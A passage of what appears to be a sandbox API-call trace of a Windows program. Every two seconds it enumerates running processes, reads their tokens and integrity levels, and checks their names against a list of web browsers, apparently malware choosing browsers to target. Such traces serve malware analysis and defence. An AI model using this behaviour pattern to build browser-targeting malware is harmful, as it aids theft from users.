dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">¾") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0508.692] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0508.692] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0508.692] GetLastError () returned 0x7a [0508.692] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0508.692] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0508.692] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0508.693] CloseHandle (hObject=0x3bc) returned 1 [0508.693] CloseHandle (hObject=0x5a4) returned 1 [0508.693] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0508.693] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0508.693] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0508.693] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0508.693] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0508.693] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0508.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0508.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0508.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0508.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0508.694] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0508.694] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0508.694] GetLastError () returned 0x7a [0508.694] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0508.695] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0508.695] CloseHandle (hObject=0x3bc) returned 1 [0508.695] CloseHandle (hObject=0x5a4) returned 1 [0508.695] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0508.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0508.695] GetVersionExW (in: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x759d390b, dwMinorVersion=0x376bd0, dwBuildNumber=0x564228, dwPlatformId=0x0, szCSDVersion="\">¿") | out: lpVersionInformation=0x20f6b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0508.695] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0508.695] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0508.695] GetLastError () returned 0x7a [0508.696] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0508.696] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0508.696] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0508.696] CloseHandle (hObject=0x3bc) returned 1 [0508.696] CloseHandle (hObject=0x5a4) returned 1 [0508.696] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0508.696] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0508.696] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0508.696] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0508.697] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0508.697] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0508.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0508.697] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0508.698] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0510.708] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa248) returned 0xc0000004 [0510.709] VirtualAlloc (lpAddress=0x0, dwSize=0xb248, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0510.709] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb248, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0510.710] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0510.710] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0510.711] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0510.711] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0510.711] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0510.711] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0510.711] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0510.711] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0510.711] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0510.711] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0510.711] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0510.711] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0510.712] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0510.712] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0510.712] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0510.712] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0510.712] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0510.712] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0510.712] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0510.712] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0510.712] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0510.713] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0510.713] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0510.713] GetLastError () returned 0x7a [0510.713] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0510.713] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0510.713] CloseHandle (hObject=0x3bc) returned 1 [0510.713] CloseHandle (hObject=0x5a4) returned 1 [0510.713] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0510.713] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0510.713] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0510.713] GetLastError () returned 0x7a [0510.713] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0510.714] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0510.714] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0510.714] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0510.714] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0510.714] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0510.714] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0510.714] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0510.714] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0510.714] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0510.714] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0510.714] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0510.714] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0510.714] GetLastError () returned 0x7a [0510.714] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0510.714] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0510.714] CloseHandle (hObject=0x3bc) returned 1 [0510.714] CloseHandle (hObject=0x5a4) returned 1 [0510.714] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0510.714] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0510.714] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0510.714] GetLastError () returned 0x7a [0510.714] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0510.714] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0510.714] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0510.714] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0510.714] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0510.714] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0510.714] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0510.714] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0510.714] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0510.714] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x5a4 [0510.714] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0510.714] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0510.714] GetLastError () returned 0x7a [0510.714] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0510.714] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0510.714] CloseHandle (hObject=0x3bc) returned 1 [0510.714] CloseHandle (hObject=0x5a4) returned 1 [0510.715] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0510.715] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0510.715] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0510.715] GetLastError () returned 0x7a [0510.715] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0510.715] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0510.715] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0510.715] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0510.715] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0510.715] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0510.715] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0510.715] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0510.715] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0510.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0510.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x5a4 [0510.715] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0510.715] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0510.715] GetLastError () returned 0x7a [0510.715] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0510.715] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0510.715] CloseHandle (hObject=0x3bc) returned 1 [0510.715] CloseHandle (hObject=0x5a4) returned 1 [0510.715] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0510.715] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0510.715] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0510.715] GetLastError () returned 0x7a [0510.715] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0510.715] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0510.715] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0510.715] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0510.715] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0510.715] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0510.715] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0510.715] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0510.715] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0510.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0510.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0510.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0510.715] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x5a4 [0510.716] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x3bc) returned 1 [0510.716] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0510.716] GetLastError () returned 0x7a [0510.716] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0510.716] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0510.716] CloseHandle (hObject=0x3bc) returned 1 [0510.716] CloseHandle (hObject=0x5a4) returned 1 [0510.716] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0510.716] OpenProcessToken (in: ProcessHandle=0x5a4, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x3bc) returned 1 [0510.716] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0510.716] GetLastError () returned 0x7a [0510.716] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x19, TokenInformation=0x41af08, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41af08, ReturnLength=0x20f7d8) returned 1 [0510.716] GetSidSubAuthorityCount (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41af11 [0510.716] GetSidSubAuthority (pSid=0x41af10*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41af18 [0510.716] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0510.716] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0510.716] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0510.716] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0510.716] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0510.716] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0510.716] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x640) returned 0x0 [0510.716] VirtualFree (lpAddress=0x370000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0510.716] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0512.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0xa1f8) returned 0xc0000004 [0512.718] VirtualAlloc (lpAddress=0x0, dwSize=0xb1f8, flAllocationType=0x1000, flProtect=0x4) returned 0x370000 [0512.719] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x370000, Length=0xb1f8, ResultLength=0x0 | out: SystemInformation=0x370000, ResultLength=0x0) returned 0x0 [0512.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0512.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0512.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0512.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0512.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0512.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0512.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0512.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0512.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0512.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0512.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0512.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0512.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0512.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0512.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0512.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0512.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0512.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0512.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0512.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0512.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5a4 [0512.722] 